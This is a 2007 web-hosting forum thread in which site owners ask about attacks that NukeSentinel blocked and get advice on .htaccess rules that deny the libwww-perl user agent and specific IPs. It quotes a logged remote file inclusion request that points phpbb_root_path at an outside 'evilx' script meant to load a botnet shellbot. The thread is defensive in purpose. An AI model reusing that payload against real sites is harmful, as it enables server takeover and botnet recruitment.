evilx ??

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

Does anyone know what this is?

Just an information question since my updated NS blocked about 30 attacks with the following string, using different ip's today.

This is the string, with the domain left off, since this is my oldest site and it seems to attract every type of mal intent. It's just a non profit festival site - nothing involving money, though it has always had a problem with email hijackers sending pump and dumps, watch sales and viagra mail. Until the recent upgrade. Not sure if it's over, but quiet so far.

Query
//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Get String: //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Post String:
//modules/Forums/admin/admin_styles.php

And ...

My forums module is inactive. Without Sentinel, could this query have worked?

Ok, one more...

What type of exploit or attack is this used for?

Thanks in advance,

Selma

evaders99 · Posted: Thu Jun 14, 2007 8:52 pm

It's a standard "Remote File Inclusion" ... this is a known exploit against older versions of phpNuke and its being used by numerous botnets. The script itself allows the hacker to check for vulnerabilities and load a shellbot script to connect to his botnet. If sucessful, he can use the compromised machine to target others.

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

Thanks for that answer, Evaders99

If I'm not careful, I could get addicted to NS and how it works.

But I guess in the wide world of addictions, that one wouldn't be so bad.

Have a good day

Selma

evaders99 · Posted: Fri Jun 15, 2007 6:07 pm

Block libwww-perl using .htaccess and that will take out 99.9% of these attempts Smile

Gremmie · Posted: Fri Jun 15, 2007 6:31 pm

This is what I use for that. I have this at the bottom of my .htaccess file:

Quote:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$

Only registered users can see links on this board!
Get registered or login to the forums!

[R,L]

I tested it by writing a perl script that tries to browse my site and it worked. Smile

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

I really can't believe how helpful everyone is around here.

Couple of years ago, I paid more than $600 for a program, that the developer installed - in the wrong folder, so it wouldn't work. Had to stay up til midnight everynight for about three weeks to catch them to continually do fixes, because they were based in India. The code was all encrypted and I finally just scrapped it for another program.

You all are WAAAAAYYYYYY better than them!

Thanks Very Happy

Selma

wiz · Client Joined: Oct 09, 2006 Posts: 394 Location: UK

always search what you can for free, then you will inevitably come across goldmine websites like this one

montego · Posted: Sat Jun 16, 2007 1:35 pm

Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out alot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.

elric · New Member Joined: Jun 15, 2007 Posts: 13

Gremmie wrote:

This is what I use for that. I have this at the bottom of my .htaccess file:

Quote:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$

Only registered users can see links on this board!
Get registered or login to the forums!

[R,L]

I tested it by writing a perl script that tries to browse my site and it worked. Smile

I have been getting these attacks for the last week or so,
would the following .htaccess be the correct way of adding your code?

Code:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]

Also, I hope you don't mind but is there any chance you could allow me a copy of your script, Id like to test mine.

Wink

Gremmie · Posted: Sat Jun 16, 2007 9:15 pm

Well I dunno if yours will work or not since I barely understand the rewrite engine...

But here is the Perl script. I got it from the 'net somewhere...

Code:

#!/usr/bin/perl
# Simple LWP browser for testing
use LWP::UserAgent;

$ua = LWP::UserAgent->new;

$req = HTTP::Request->new(GET => 'http://www.yoursite.com/');
$req->header('Accept' => 'text/html');

# send request
$res = $ua->request($req);

# check the outcome
if ($res->is_success)
{
print $res->content;
}
else
{
print "Error: " . $res->status_line . "\n";
}

elric · New Member Joined: Jun 15, 2007 Posts: 13

Thanks

Been searching around and found this .htaccess generator, it does not do everything but it's pretty neat.

Only registered users can see links on this board!
Get registered or login to the forums!

I have also now uncovered more questions,
How to incorperate the above and also the sentinel code?

So far I have this

Code:

RewriteEngine On
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ http://127.0.0.1 [R,L]

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
deny from all
</Files>

<Files .staccess>
deny from all
</Files>

<Files admin.php>
<Limit GET POST PUT>
require valid-user
</Limit>
AuthName "Restricted"
AuthType Basic
AuthUserFile /path/to/your/.staccess
</Files>

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------

Can anyone with more knowledge than me (that's not hard) tell me if they can see any errors?

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

montego wrote:

Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out alot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.

Glad you brought up that point, Montego. I've been thinking about that for the past couple of days.

I see that Raven asks for a combined total of 400 a month... Which is a pittance IMO.

I have to admit to being a spastic donator, once every few months or so. But I mentioned somewhere else that since starting my first for profit site, I intend to include RN in the monthly budget as a regular expense.

If there are 15,000 users plus and a third are regular users...

What would a good "support" donation be? Support to the point that the ecommerce module and some other major revision work that's talked about on the forum could be done?

During those couple of days referred to earlier, this thought's been running through my mind.

A donation from a few people of $50 adds up to a couple hundred dollars.

But... suppose "someone" (church lingo for "the person who suggested it") organized a type of pledge drive based on the fact that thousands of people use the scripts and tools and many actually depend on what you do to keep their start ups running efficiently.

Then suppose that 5,000 of the 15,000 would agree to pledge $5 per month.

Going a step beyond your donation mod, there could be a Supporters Hall where the name of the business or the person could be posted with a link - or something else clever that everyone would be dying to get their name or business posted to... Maybe a "Support Where it Counts" kind of button for webs.

Without getting way off track, 5,000 people at $5 a month is enough to keep a few staff members secure.

I love organizing and I certainly wouldn't mind putting some work into this kind of effort, and I think I still have free time between 5 - 6 am LOL

So, tell me your thoughts.

... And, noob alert:

Code:

RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

What does this part of that code do?

I added the previous three lines of the code from Gremmie the other day, and haven't gotten any more attacks - thank you very much.

I understand what the code does, but I don't know how it does, if that makes sense - or, is that part of your testing code or the cooletips engine coding?

... And

Can you put the "libwww-perl" into the string, or script or referrer blocker in Sentinel?

Thanks in advance,

Selma

Gremmie · Posted: Tue Jun 19, 2007 9:48 am

It is easy for Perl programmers to forge the user agent. I am now seeing similar attacks on my site. It looks like the same scripts but now the user agent says Mozilla instead of libwww-perl. But Sentinel is stopping them.

That code looks like like it is rewriting mysite.com into

Only registered users can see links on this board!
Get registered or login to the forums!

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

Got it

Thanks

elric · New Member Joined: Jun 15, 2007 Posts: 13

Thanks Gremmie,
And thanks for answering my next question before I'd even asked it.
I am no longer seeing the perl attacks but like you I have seen about 3 MoZilla/4.0 attacks and like you say, sentinel is stopping them.
The latest points to the script below.

Only registered users can see links on this board!
Get registered or login to the forums!

Gremmie · Posted: Tue Jun 26, 2007 5:46 pm

It is easy to modify that Perl script to change the user agent part of the header. The LWP module supports that.

elric · New Member Joined: Jun 15, 2007 Posts: 13

And it certainly looks like that has been done, I am not getting any attacks with User Agent: perl but now I am getting attacks like User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR

About 3 or 4 nearly every day.
a lot similar to the following

Code:

www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[PLM=0]+GET+http://www.mysite/modules.php?name=Forums+[0,9018,76382]+->+[L]+POST+http://www.mysite/modules.php?name=Your_Account+[0,0,60072]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=viewforum&f=1+[0,0,124857]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[0,43072,59023]+->+[N]+POST+http://www.ffclan.us/modules.php?name=Forums&file=posting+[0,0,37628]
Get String:

Only registered users can see links on this board!
Get registered or login to the forums!

[0,0,37628]&mode=newtopic&f=1 [0,43072,59023] -> [N] POST http://www.mysite/modules.php?name=Forums
Post String:

Only registered users can see links on this board!
Get registered or login to the forums!

Forwarded For: none
Client IP: none
Remote Address: 65.96.84.33
Remote Port: 1950
Request Method: GET

What I can't understand is why my site seems to be a target, where as here for example has a mere 11 attacks blocked compared to my currently 84, my site has way less traffic and I would certainly believe a much lower search engine rating.
Anyone know how targets are picked, I am guessing via a search engine.

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

Quote:

What I can't understand is why my site seems to be a target, where as here for example has a mere 11 attacks blocked compared to my currently 84,

Hey Elric, Thought I was the only one they targeted for no good darn reason. Figured they probably know they can't get into Raven's site.

My site is a local arts organization. Nothing real exciting to want to break into. But one thing I did find out was that spammers especially, like to use the address of "trusted" sites to send their mail from. It means less bounces for them because the "trusted" address they are spoofing will get through most spam filters - by IP address anyway.

So maybe your search engine theory is right. Good search position = trusted site.?.?

Still can't figure out why anyone else would want to get in though.

fkelly · Posted: Thu Jul 05, 2007 1:44 pm

Quote:

Still can't figure out why anyone else would want to get in though.

Cause they are idiots and don't know or care what they are hacking. They just search for sites randomly and try various forms of attack and if they can hack you they get their jollies. So to speak. Don't try to attribute rationality to it. Just defend yourself as best you can.

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

"Cause they are idiots and don't know or care what they are hacking."

Agreed!

They need some kids and bills and stuff. Give em something to do!

Anybody seen this one? Only ask because this sites been getting hit with all types of mail that I know is blocked. Which leads me to believe this sender has access somewhere I can't see.

mail came from ...

Received: from word9 ([127.0.0.1]) by writely.com with Microsoft SMTPSVC(6.0.3790.1830);
Fri, 06 Jul 2007 04:14:56 +0800
Message-Id: <9.0.9.1.3.97943802796608.0[3

No subject, body-message, or return sender in the actual letter. Just a blank mail. And that is the end of the header

Received: from word9 ([127.0.0.1]) This part looks like they are in my control panel and sending from there.

Freaky

Susann · Posted: Thu Jul 05, 2007 3:16 pm

Agreed the most are idiots especially those script kiddies wich just copy and paste some code. I have met different types of them online and talked back.
The most are young and they don´t know the difference between crime and fun.
I could write a book about these stories but I don´t publish something like that. Its in my memory thats enough. Smile

My last meeting was also funny. Someone registered new and in the meantime while he was in his store his friend played with his PC and tried to hack my site.
The new registered didn´t know why he suddenly couldn´t post in my forum anymore after he came back from his store.Thats just one little funny story from my board.
But there are others too and they are really dangerous because they have the knowledge and the money to do these things like Botnets etc.
However, currently are iframes very popular.
For example google for: hacked by

Only registered users can see links on this board!
Get registered or login to the forums!

German Nuke sites and phpBB boards are already hacked by them.

elric · New Member Joined: Jun 15, 2007 Posts: 13

Thanks for all your posts, for information I'm now at 94 attacks. I agree with all your coments but I just feel it's more than random.
I have even googled my site url in the hope of finding it posted in a security site with the "bet you can't hack me" type thing but to no avail.

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

Posted here: Union + nuke_authors

Only registered users can see links on this board!
Get registered or login to the forums!

selma · Hangin' Around Joined: May 09, 2006 Posts: 31

posted elsewhere -

elric · New Member Joined: Jun 15, 2007 Posts: 13

I'm not entirely sure what the link you supplied is telling me but It did highlight to me some of the comments posted to news topics, which contained spammage of links and all sorts of text, I have deleted these and I hope perhaps this will drop someof the search engines picking up on key words like an*l etc etc.

Once again Thank you for your help.